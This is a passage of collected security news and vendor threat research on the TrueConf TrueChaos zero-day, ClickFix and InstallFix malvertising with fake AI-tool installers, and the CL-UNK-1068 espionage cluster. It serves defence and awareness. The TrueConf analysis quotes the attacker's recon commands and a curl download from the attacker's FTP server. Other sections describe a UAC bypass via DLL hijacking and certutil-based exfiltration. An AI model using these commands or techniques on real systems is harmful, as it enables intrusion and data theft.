MSI packages on victim systems. This is achieved by downloading auxiliary VBS files hosted on AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries. "Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses," Redmond said. "It continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under HKLM\Software\Microsoft\Win, and embedding persistence mechanisms to ensure the infection survives system reboots." These actions allow the threat actors to gain elevated privileges without user interaction via a combination of Registry manipulation with UAC bypass techniques, and ultimately deploy unsigned MSI installers. This includes legitimate tools like AnyDesk that provide attackers with persistent remote access, enabling the attackers to exfiltrate data or deploy more malware. "This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting," Microsoft said.
thehackernews.comApr 1, 2026extracted
TrueConf Zero-Day Exploited in Attacks on Southeast Asian Government Networks
A high-severity security flaw in the TrueConf client video conferencing software has been exploited in the wild as a zero-day as part of a campaign targeting government entities in Southeast Asia dubbed TrueChaos. The vulnerability in question is CVE-2026-3502 (CVSS score: 7.8), a lack of integrity check when fetching application update code, allowing an attacker to distribute a tampered update, resulting in the execution of arbitrary code. It has been patched in the TrueConf Windows client starting with version 8.5.3, released earlier this month. "The flaw stems from the abuse of TrueConf's updater validation mechanism, allowing an attacker who controls the on-premises TrueConf server to distribute and execute arbitrary files across all connected endpoints," Check Point said in a report published today. In other words, an attacker who manages to gain control of the on-premises TrueConf server can substitute the update package with a poisoned version, which then gets pulled by the client application installed on customers' endpoints, owing to the fact that it does not enforce adequate validation to ensure that the server-provided update has not been tampered with. The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints. The activity has been attributed with moderate confidence to a Chinese-nexus threat actor. Attacks exploiting the vulnerability were first recorded by the cybersecurity company at the beginning of 2026, with the implicit trust the client places in the update mechanism being weaponized to push a rogue installer that, in turn, leverages DLL side-loading to launch a DLL backdoor. The DLL implant ("7z-x64.dll") has also been observed performing hands-on-keyboard actions to conduct reconnaissance, set up persistence, and retrieve additional payloads ("iscsiexe.dll") from an FTP server ("47.237.15[.]197"). The primary objective of "iscsiexe.dll" is to ensure the execution of a benign binary ("poweriso.exe") that's dropped to sideload the backdoor. Although the exact final-stage malware delivered as part of the attack is not clear, it's assessed with high confidence that the end goal is to deploy the Havoc implant. TrueChaos' links to a Chinese-nexus threat actor are based on the observed tactics, such as the use of DLL side-loading, Alibaba Cloud, and Tencent for C2 infrastructure, and the fact that the same victim was targeted within the same time frame by ShadowPad, a sophisticated backdoor widely used by China-linked hacking groups. On top of that, the use of Havoc has been attributed to another Chinese threat actor called Amaranth-Dragon in intrusions aimed at government and law enforcement agencies across Southeast Asia in 2025. "The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually," Check Point said. "Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks." Update The U.S. Cybersecurity and Infrastructure Security Agency (CISA), on April 2, 2026, added CVE-2026-3502 to its Known Exploited Vulnerabilities (KEV) catalog, mandating that Federal Civilian Executive Branch (FCEB) agencies apply the necessary fixes by April 16, 2026.
thehackernews.comMar 31, 2026extracted
Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets
Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets March 31, 2026 Key Points Check Point Research identified a zero-day vulnerability in the TrueConf client application, tracked as CVE-2026-3502, with a CVSS score of 7.8. The flaw stems from the abuse of TrueConf’s updater validation mechanism, allowing an attacker who controls the on-premises TrueConf server to distribute and execute arbitrary files across all connected endpoints. This vulnerability has been exploited in-the-wild as part of a targeted campaign we call “TrueChaos” against government entities in Southeast Asia, where the threat actor abused the TrueConf update mechanism to deploy the Havoc payload to vulnerable machines. Based on the observed TTPs, command and control infrastructure and victimology, we assess with moderate confidence that this activity is associated with a Chinese-nexus threat actor. Check Point Research responsibly disclosed this vulnerability to TrueConf. Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was released in March 2026. The current version of the desktop apps is 8.5.2. Introduction At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment. The investigation led to the discovery of a zero-day vulnerability in the TrueConf client, tracked as CVE-2026-3502 with a CVSS score of 7.8. The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints. TrueConf is a video conferencing platform that supports both on-premises and cloud deployments and is used across multiple regions, most prominently in Russia, as well as in East Asia, Europe, and the Americas. Serving more than 100,000 organisations globally, their global customers range from key governments and defense departments and critical infrastructure industries to significant businesses such as banks, power and TV stations. In enterprise environments, its on-premises architecture creates a trusted relationship between the central server and connected clients, especially through the platform’s update mechanism. Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection. It is primarily used by government, military, and critical infrastructure sectors to ensure absolute data privacy and communication autonomy in secure or remote environments. In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems. In this particular case, that trust was abused to deliver malware due to improper validation in the update process. In the observed in-the-wild activity, operation “TrueChaos”, the threat actor used the trusted update channel of a centrally managed on-premises TrueConf server to distribute malicious updates to multiple connected government agencies in a South Eastern country. The victimology and regional focus of the campaign suggest an espionage-motivated operation. In combination with the observed TTPs and command-and-control infrastructure, these indicators point with moderate confidence to a Chinese-nexus threat actor. About TrueConf TrueConf is a video conferencing platform that supports both on-premises and cloud deployments. Although it is most widely used in Russia, it also has a notable presence across parts of East Asia, Europe, and the Americas. To better understand the potential scope of the vulnerability, we reviewed internet exposed TrueConf servers to assess the platform’s geographic distribution and the possible reach of the attack. This view is necessarily incomplete, as many TrueConf deployments may operate entirely in on-premises environments and remain inaccessible from the public internet. CVE-2026-3502 Root Cause Analysis When the TrueConf client starts, it checks the connected on-premises server for available updates. If the server has a newer client version than the one installed, the application prompts the user to download the update from https://{trueconf_server}/downlods/trueconf_client.exe, which maps to the file stored on the server under C:\Program Files\TrueConf Server\ClientInstFiles\. TrueConf client update starts when the client detects a version mismatch in favor of the TrueConf on-premises server, the client alerts the user that a newer version is available and offers to download it. The vulnerability stems from the lack of integrity and authenticity checks in this update flow. An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients. Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update. In-The-Wild Exploitation The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available. Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process. The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update. Analysis of the downloaded package showed that it was a weaponized client update. The installation was built by Inno Setup. It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2. Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso\, which was then loaded through DLL side-loading. Using the malicious 7z-x64.dll implant, the attacker performed a series of hands-on-keyboard actions focused on reconnaissance, environment preparation, persistence, and the retrieval of additional payloads. Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser: ftp://47.237.15[.]197/update.7z -oc:\program files\winrar\winrar.exe x update.7z -p iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll. By placing a malicious iscsiexe.dll in a user-controlled location referenced through the user’s %PATH%, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe, resulting in privilege escalation without a UAC prompt. The downloaded update.7z archive contained a legitimate 7z.exe binary alongside iscsiexe.dll, a component used by the attackers as part of the post-compromise workflow. Check Point Research also identified additional variants of the archive that included an encrypted 7z archive named rom.dat. At the time of analysis, the contents and purpose of rom.dat remained unclear. The iscsiexe.dll component appears to be a simple, custom persistence and privilege escalation tool. Rather than serving as a full-featured backdoor, its role was limited to maintaining execution of winexec.exe, which is the renamed poweriso.exe binary dropped earlier in the infection chain. Although Check Point Research did not recover the exact final-stage payload associated with the malicious 7z-x64.dll activity, it observed network communication to 47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure, and also identified Havoc demon sample linked to actor C2 infrastructure. Based on this combined evidence, Check Point Research assesses with high confidence that the missing payload was a Havoc implant. Havoc is an open-source post-exploitation framework intended for penetration testing and adversary emulation, but it has also been repeatedly abused by threat actors in real-world intrusions, including Chinese-nexus Amaranth Dragon activity recently documented by Check Point Research. Attribution Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor. The assessment is based on a combination of factors, including TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure and the victimology aligns with Chinese nexus strategic interests. We also observed that the same victim was targeted within the same time frame by ShadowPad malware framework. This may indicate overlap in operator tooling, shared access, or the presence of multiple China-aligned actors targeting the same organization in parallel. Conclusion The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually. Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks. From a research perspective, this case shows how monitoring and analysing routine execution techniques can uncover far more significant threats. What initially appeared to be a signed binary used for DLL sideloading ultimately led to the discovery of a zero-day vulnerability in TrueConf’s update validation mechanism. Hunting Recommendations In order to identify whether you have been compromised, review the following indicators and hunting opportunities across the affected system: Check whether trueconf_windows_update.exe is unsigned, as an unsigned update executable may indicate that the file is suspicious or has been tampered with. Treat the system as potentially infected if C:\ProgramData\PowerISO\poweriso.exe is present on disk, especially if this file is not expected in your environment. Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe, as this indicates persistence through a user logon autorun entry. Treat the system as potentially infected if files such as %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, or rom.dat are present, or if there is evidence that they were recently created and then deleted. Hunt for file creation activity in which trueconf_windows_update.tmp creates C:\ProgramData\PowerISO\poweriso.exe or 7z-x64.dll, as this behavior is consistent with the observed delivery chain. Hunt for poweriso.exe spawning commands through cmd.exe, particularly when the command line includes tools or utilities such as curl, winrar.exe, or netstat, since this may indicate download, extraction, or discovery activity. Hunt for the suspicious parent-child process chain trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp -> any executable, as this sequence may reveal execution of the malicious payload. “The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign Check Point Research Publications August 11, 2017 “The Next WannaCry” Vulnerability is Here Check Point Research Publications March 12, 2026 “Handala Hack” – Unveiling Group’s Modus Operandi SUBSCRIBE TO CYBER INTELLIGENCE REPORTS We value your privacy! BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.
research.checkpoint.comMar 31, 2026extracted
ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers
Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync. "Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands," Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey said. It's currently not known if the campaigns are the work of the same threat actor. The use of ClickFix lures to distribute the malware was also flagged by Jamf Threat Labs in December 2025. The details of the three campaigns are as follows - November 2025: A campaign that used OpenAI's ChatGPT Atlas web browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command to it. This action downloaded a shell script, which prompts the user to enter the system password and runs MacSync with user-level permissions. December 2025: A malvertising campaign that leveraged sponsored links tied to searches for queries like "how to clean up your Mac" on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site to give the impression that the links were safe. The ChatGPT conversations redirected victims to malicious GitHub-themed landing pages that tricked users into running malicious commands on the Terminal app. February 2026: A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response. The shell script launched after running the Terminal command is designed to contact a hard-coded server and retrieve the AppleScript infostealer payload, while simultaneously taking steps to remove evidence of data theft. The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets. The latest findings suggest the threat actors are adapting the formula to stay one step ahead of security tools, while weaponizing the trust associated with ChatGPT conversations to convince users to run malicious commands. The new variant observed in the most recent campaign "likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness," Sophos said. "Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future." In recent months, ClickFix campaigns have used legitimate platforms like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools like Anthropic's Claude Code. The URLs are distributed via malicious search engine ads. The instructions, as before, deceive victims into installing infostealer malware like Amatera Stealer instead. The social engineering attack has been codenamed InstallFix or GoogleFix. According to Nati Tal, head of Guardio Labs, similar infection chains lead to the deployment of Alien infostealer on Windows and Atomic Stealer on macOS. The PowerShell command executed after pasting and running the supposed installation command for Claude Code fetches a legitimate Chrome extension package within a malicious HTML Application (HTA) file, which then launches an obfuscated .NET loader for Alien in memory, per Tal. Guardio has described GoogleFix as a malvertising campaign that takes advantage of sponsored Google search results to redirect users looking for solutions to common macOS problems to malicious pages hosted on various platforms like Grammarly, Coda, Kimi, Medium, Squarespace, and Writesonic. The result is a "turnkey, industrialized pipeline" for malware delivery, it added. "While traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn't need any of that," Push Security said. "The pretext is simply the user wanting to install legit software." According to Pillar Security, there have been at least 20 distinct malware campaigns that have targeted artificial intelligence (AI) and vibe coding tools between February and March 2026. These include code editors, AI agents, large language models (LLM) platforms, AI-powered browser extensions, AI video generators, and AI business tools. Of these, nine have been found to target both Windows and macOS, with another seven exclusively affecting macOS users. "The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets)," Pillar Security researcher Eilon Cohen said. "The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight." Needless to say, the advantage posed by ClickFix (and its variants) has led to the tactic being adopted by multiple threat actors and groups. This includes a malicious traffic distribution system (TDS) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124), which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT. The attackers inject malicious JavaScript into legitimate WordPress websites that prompt users to run a PowerShell command responsible for initiating a multi-stage infection process to deploy the trojan. "The group continues to use this method alongside the newer CrashFix technique, which tricks users into installing a malicious browser extension to initiate infection," Trend Micro said. "The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections." That's not all. KongTuke campaigns have also been spotted using DNS TXT records in their ClickFix script. These DNS TXT records stage a command to retrieve and run a PowerShell script. Other ClickFix-style pastejacking attacks that have been detected in the wild are listed below - Using compromised websites to display lures for ClickFix pages that mimic Google's "Aw Snap!" error or browser updates to distribute droppers, downloaders, and malicious browser extensions. Using ClickFix decoys served via malvertising/phishing links to direct users to malicious pages that lead to the deployment of Remcos RAT. Using a fake CAPTCHA verification lure on a phony website promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code retrieved from a server. Using a bogus website advertising CleanMyMac to trick users into running a malicious Terminal command to deploy a macOS stealer named SHub Stealer and backdoor cryptocurrency wallets such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live to steal the seed phrases. Using a fake CAPTCHA verification lure on compromised websites to run a PowerShell script that delivers an MSI dropper, which then installs the Deno JavaScript runtime to execute obfuscated code that ultimately installs CastleRAT in memory by means of a Python loader named CastleLoader. In a report published last week, Rapid7 revealed that highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge. The activity has been active since December 2025. More than 250 infected websites have been identified in at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the U.K., and the U.S. The websites have been identified as regional news outlets and local businesses. The end goal of these lures is to compromise the Windows systems with different stealer malware families: StealC Stealer, an improved version of Vidar Stealer, a .NET stealer dubbed Impure Stealer, and a C++ stealer referred to as VodkaStealer. The stolen data can then act as a launchpad for financial theft or follow-on attacks. The exact method by which the WordPress sites are hacked is presently not known. However, it's suspected to involve the exploitation of recently disclosed security flaws in WordPress plugins and themes, previously stolen admin credentials, or publicly accessible wp-admin interfaces. To counter the threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts. "The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors," Rapid7 said. "An important takeaway from this report should be that even trusted websites can be compromised and weaponized against unsuspecting visitors."
thehackernews.comMar 16, 2026extracted
Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign
A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports. As part of the campaign, dubbed InstallFix, threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones. One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results. The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code. “Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” Push Security notes. Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection. “We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign,” Push Security says. The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic. Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website, hosting rogue OpenClaw installers in GitHub repositories, and distributing malware through NPM packages mimicking Claude Code. “But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation,” Push Security notes. Related: Microsoft Warns of ClickFix Attack Abusing DNS Lookups Related: Malicious Chrome Extension Crashes Browser in ClickFix Variant ‘CrashFix’ Related: Hackers Weaponize Claude Code in Mexican Government Cyberattack Related: Infostealer Malware Delivered in EmEditor Supply Chain Attack
securityweek.comMar 9, 2026extracted
Fake Claude Code install guides push infostealers in InstallFix attacks
Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to convince users into running malicious commands under the pretext of installing legitimate command-line interface (CLI) tools. The new trick exploits the common practice among developers these days of downloading and executing scripts through 'curl-to-bash' commands from online sources without closely inspecting the assets first. Researchers at Push Security, a browser threat detection and response company, found that attackers use the new InstallFix technique with cloned pages for popular CLI tools that serve malicious install commands. Since the current security model "boils down to 'trust the domain'," and more non-technical users are now working with tools previously reserved for developers, InstallFix may become a larger threat, the researchers say. In a report today, Push Security highlights a cloned installation page for Claude Code, Anthropic’s CLI coding assistant, that features the same layout, branding, and documentation sidebar as the legitimate source. The difference is in the installation instructions for macOS and Windows (PowerShell and Command Prompt), which deliver malware from an attacker-controlled endpoint. The researchers say that apart from the installation instructions, all links on the fake page redirect to the legitimate Anthropic site. “So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong,” Push Security notes in the report. The attackers promote these pages through malvertising campaigns on Google Ads, causing malicious ads to appear in search results for queries such as “Claude Code install” and “Claude Code CLI.” BleepingComputer could confirm that the malicious websites are still being promoted through Google-sponsored search results. When looking for the query "install claude code," the first result was a Squarespace URL (claude-code-cmd.squarespace[.]com) pointing to a perfect clone of the official Claude Code documentation. Amatera infections Based on Push Security's analysis, the payload delivered through these InstallFix attacks is the Amatera Stealer, a piece of malware designed to steal sensitive data (cryptocurrency wallets, credentials) from compromised systems. The malicious InstallFix commands for macOS contain base64-encoded instructions for downloading and executing a binary from a domain controlled by the attacker. In one case, BleepingComputer found that the threat actor used the domain wriconsult[.]com, which is currently down. For Windows users, the malicious command uses the legitimate utility ‘mshta.exe’ to retrieve the malware and triggers additional processes like ‘conhost.exe’ to support the execution of the final payload, Amatera information stealer. Amatera is a fairly new malware family, believed to be based on the ACR Stealer, sold as a subscription service (MaaS) to cybercriminals. The malware was recently observed distributed in separate ClickFix attacks that abused Windows App-V scripts for payload delivery. It can steal passwords, cookies, and session tokens stored in web browsers and collect system information while evading detection by security tools. Push Security reports that the attacks are particularly evasive, also because the malicious sites are hosted on legitimate platforms such as Cloudflare Pages, Squarespace, and Tencent EdgeOne. The researchers also published a video showing how the InstallFix attack works, from the search query to copying a malicious command. In a campaign last week, threat actors used the InstallFix technique with fake OpenClaw installers hosted in GitHub repositories that were promoted by Bing's AI-enhanced search results. Users looking for Claude Code must ensure they get installation instructions from official websites, block or skip all promoted Google Search results, and bookmark software download portals for tools they need to re-download frequently. The researchers provide indicators of compromise that include the domains for serving the cloned guides, for hosting the malicious payloads, and the InstallFix commands. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 6, 2026extracted
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications. Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined. We assess with high confidence that the attackers behind CL-UNK-1068 are a Chinese threat actor. This assessment is based on the origin of their tools, linguistic artifacts in configuration files, and their consistent, longstanding targeting of critical infrastructure in Asia. We assess with moderate-to-high confidence that the primary objective of the attackers is cyberespionage, although we cannot fully rule out the possibility of cybercriminal motivation at this time. Through a long period of close observation, we identified the specific tools and techniques that define this group. Our attribution of this activity to CL-UNK-1068 is done in accordance with Unit 42’s attribution framework. We provide a detailed analysis of the attack patterns and methods that we identified in our investigation into this cluster of activity. Palo Alto Networks customers are better protected from the threats described through the following products and services: Advanced URL Filtering and Advanced DNS Security Next-Generation Firewall (NGFW) with Advanced Threat Prevention Advanced WildFire Cortex XDR and XSIAM If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. We provide a detailed analysis of the tool set deployed by the attackers behind CL-UNK-1068 across different intrusion campaigns since 2020. While these attacks demonstrate a consistent set of techniques and procedures (TTPs), it is important to note that not every tool was used in every observed intrusion. Our analysis reveals a multi-faceted tool set that includes custom malware, modified open-source utilities and living-off-the-land binaries (LOLBINs). These provide a simple, effective way for the attackers to maintain a persistent presence within targeted environments. The CL-UNK-1068 activity cluster is characterized by cross-platform cyber capabilities, maintaining a diverse set of tools for both Windows and Linux environments. Their TTPs rely heavily on open-source utilities and malware variants popular with Chinese-speaking users, including GodZilla, AntSword, Xnote and Fast Reverse Proxy (FRP). One of the techniques we observed in these attacks is the use of legitimate Python executables to launch DLL side-loading attacks. This approach enables the attackers to stealthily load additional payloads. The initial access to environments targeted in CL-UNK-1068 activity is achieved by deploying and utilizing various web shells. We observed the attackers deploying the GodZilla web shell, and a variation of AntSword, both of which are written in a combination of English and Simplified Chinese. After gaining an initial foothold, the attackers use these web shells to move laterally to additional hosts and SQL servers. Figure 1 shows an alert that was triggered when an attacker attempted to exploit a Linux server. After gaining access to targeted environments, the attackers attempt to steal the following files from the c:\inetpub\wwwroot directory of a Windows web server: web.config .aspx .asmx .asax .dll The attackers could use this stolen information to extract credentials for lateral movement, or to discover vulnerabilities in the website's code. The alert in Figure 2 shows that the attackers archived the stolen files under the names web.rar, web1.rar and web2.rar. After moving to additional servers, the attackers continued to steal files related to the website’s configuration, such as .json files from the c:\inetpub\wwwroot directory, including the appsettings.json file. In multiple instances, the attackers used a simple but effective approach to exfiltrate files: Using WinRAR to archive the relevant files. Executing the certutil -encode command to Base64-encode the .rar archives. Executing the type command to print the Base64 content to their screen through the web shell. By encoding the archives as text and printing them to their screen, the attackers were able to exfiltrate data without actually uploading any files. The attackers likely chose this method because the shell on the host allowed them to run commands and view output, but not to directly transfer files. Figure 3 shows the alert triggered by the data exfiltration activity. In addition to stealing configuration files, the attackers stole other types of sensitive data: Browser history and web browser bookmarks Sensitive XLSX and CSV files from desktops and USER directories .bak files from MSSQL servers (database backup files) In certain instances, the attackers deployed usql, a universal command-line interface for multiple databases. The use of this interface may indicate that one of the goals of CL-UNK-1068 activity is to extract data directly from SQL servers. We analyzed the most noteworthy tools and utilities that the attackers behind CL-UNK-1068 used across multiple intrusion campaigns since 2020. A detailed analysis of additional tools and utilities used during this activity is provided in Appendix B. In attacks that we observed, the attackers behind CL-UNK-1068 frequently used DLL side-loading to execute their tool set. They deployed a legitimate Python programming language executable like python.exe or pythonw.exe alongside a malicious side-loaded DLL that served as a loader, using a name like python20.dll. The attackers also dropped an obfuscated shellcode file with a similar name, to match the legitimate executable naming convention (e.g., python or pythonw). When the legitimate python.exe is executed, it side-loads a malicious loader named python20.dll. The malicious loader reads the obfuscated shellcode, deobfuscates it in memory, and then executes it within the memory space of the legitimate Python process. The shellcode then decrypts and executes the payload in memory. The attackers used this technique to load and execute several tools as payloads, including FRP, PrintSpoofer and a custom scanner that they named ScanPortPlus. Figure 4 shows the legitimate python.exe process used to read shellcode from a file named python and execute a decrypted payload for ScanPortPlus in memory. The attackers behind CL-UNK-1068 scanned compromised networks using a custom scanner that they internally named ScanPortPlus. This custom tool is written in Go, and the threat actor compiled versions for both Windows and Linux systems. Figure 5 shows the command-line options of ScanPortPlus, which include IP address, port and vulnerability scanning. In some of the events that we observed, the attackers deployed FRP, to establish persistent access while bypassing firewalls. The attackers used versions of their own custom-compiled FRP for Windows and Linux systems, including a custom FRP that had several unique identifiers: Unique authentication token: Attackers used the authentication token frpforzhangwei (“frp for zhang wei”). Zhang Wei is a common Chinese name. Proxy naming convention: The proxy names appear to have a consistent naming convention across the versions: - Windows: 10014-win-nic-32-v - Linux: - 20012-linux-64-V - 10013-linux-64-V Unique common password: The password for the FRP is the same in all samples that the threat actor used: f*ckroot123 (profanity masked). Figure 6 highlights the identifiers that we discovered in the FRP samples. In some instances, the attackers behind CL-UNK-1068 deployed the Xnote malware on Linux servers. First discovered in 2015, Xnote is a Linux backdoor that various Chinese threat actors previously used. Xnote has several variants, each with slightly different functionality. The Xnote used by CL-UNK-1068 primarily provides distributed denial-of-service (DDoS) attack capabilities, in addition to other commands. Table 1 lists some of the capabilities of this Xnote variant. Table 1. Xnote task names and functions. Our observations reveal that in 2020, the attackers deployed a custom tool named SuperDump for reconnaissance. In the years following, we saw that the attackers transitioned to a new method of using batch scripts for reconnaissance purposes. In intrusions dating back to 2020, the attackers behind CL-UNK-1068 attempted to use a custom .NET tool that they named SuperDump. The tool’s purpose is to collect information from Windows hosts, such as: User information Host information: IP address, running processes, system information, drive information Files from desktop and document folders Installed programs Local Security Authority Subsystem Service (LSASS) process dump content Registry information: - Navicat configuration (database management tool) - WinSCP configuration - RDP configuration - Internet Explorer settings - Environment variables - PuTTY configuration - FileZila data - NetSarang Xmanager data (remote desktop software) - SSH data - PowerShell history - Microsoft\Windows\Recent registry key (recent programs) Figure 7 shows the functions in SuperDump’s code that gather information. We discovered that the use of SuperDump was later replaced by batch script files called hpp.bat and hp.bat, which also collect host information. The functionality of these batch files is detailed in the following section. In more recently observed cases, after successfully compromising an endpoint, the attackers initiate the reconnaissance phase. This involves deploying custom batch scripts to gather initial host telemetry and map the local environment. The specific naming conventions for both scripts and output files constitute a unique signature that we observed across multiple attacks over several years. We observed that in several instances, the attackers executed a batch script named hp.bat or hpp.bat, and on one occasion, a.bat. Each of these batch scripts executed multiple commands and saved the results in matching .txt files. The attackers utilized these scripts to perform host reconnaissance, gather telemetry on the local system and map other potential servers in the environment. For a detailed analysis of the scripts, output filenames and executed commands, see Appendix B. After all the output files were written to disk, attackers executed an additional rar.bat/rr.bat batch script that was responsible for archiving the result files using commands such as: rar.exe a -df host.rar *.txt rar a -df host.rar *.txt *.db rar a -df host.rar *.txt *.db *hist* *book* This section provides a comprehensive description of the various tools and methods utilized in CL-UNK-1068 activity to execute credential theft. The attackers used Mimikatz to dump passwords from memory, and a dumping tool named LsaRecorder, as Figure 8 shows. The LsaRecorder tool captures login passwords by hooking the LsaApLogonUserEx2 callback function. The LsaRecorder tool was shared on the Chinese security forum called Kanxue in 2019. Figure 9 shows the LsaRecorder command-line options, which include the 